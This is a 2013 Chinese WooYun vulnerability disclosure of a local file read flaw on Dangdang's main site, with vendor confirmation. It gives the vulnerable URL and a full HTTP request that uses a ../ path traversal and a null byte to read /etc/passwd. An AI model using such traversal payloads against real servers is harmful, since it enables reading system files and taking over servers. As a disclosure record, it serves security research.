漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-024765
漏洞标题:当当网主站本地文件读取漏洞
相关厂商:当当网
漏洞作者: akast
提交时间:2013-05-29 22:10
修复时间:2013-07-13 22:11
公开时间:2013-07-13 22:11
漏洞类型:任意文件遍历/下载
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-05-29: 细节已通知厂商并且等待厂商处理中
2013-05-29: 厂商已经确认,细节仅向厂商公开
2013-06-08: 细节向核心白帽子及相关领域专家公开
2013-06-18: 细节向普通白帽子公开
2013-06-28: 细节向实习白帽子公开
2013-07-13: 细节向公众公开
简要描述:
当当网主站本地文件读取漏洞,通过此漏洞可以拿网站或服务器权限的,和音乐、影视频道一样,不同服务器!!
详细说明:
漏洞地址:http://www.dangdang.com/default_json_file_2012.php?area_num=/../..//../..//../..//../..//../..//etc/passwd%00&area_name=L3&screensize=1920&t=0.002583379581056311
漏洞测试:
GET /default_json_file_2012.php?area_num=/../..//../..//../..//../..//../..//etc/passwd%00&area_name=G62&id=1&screensize=1920&t=0.6488959508096191 HTTP/1.1
Referer: http://www.dangdang.com:80/
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Pragma: no-cache
Host: www.dangdang.com
X-Scan-Memo: Category="Audit"; Function="createStateRequestFromAttackDefinition"; SID="1756DB7EFADF5C0EF7BE96D4363A999D"; PSID="32F22C029EDE0F807236E43BD10C8D72"; SessionType="AuditAttack"; CrawlType="None"; AttackType="QueryParamManipulation"; OriginatingEngineID="e33e6007-8935-4d72-b11b-6199480d6c88"; AttackSequence="4"; AttackParamDesc="area_num"; AttackParamIndex="0"; AttackParamSubIndex="0"; CheckId="(null)"; Engine="LFI+Agent"; Retry="False"; SmartMode="NonServerSpecificOnly"; AttackString="%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2f..%2f..%2f%2fetc%2fpasswd%2500"; AttackStringProps="Attack";
Connection: Keep-Alive
Cookie: CustomCookie=akast123456ZX1496FF27D5214444978008397A2723B2Y7316
漏洞证明:
修复方案:
和影视频道一样。
版权声明:转载请注明来源 akast@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2013-05-29 22:21
厂商回复:
非常感谢,我们立刻修补
最新状态:
暂无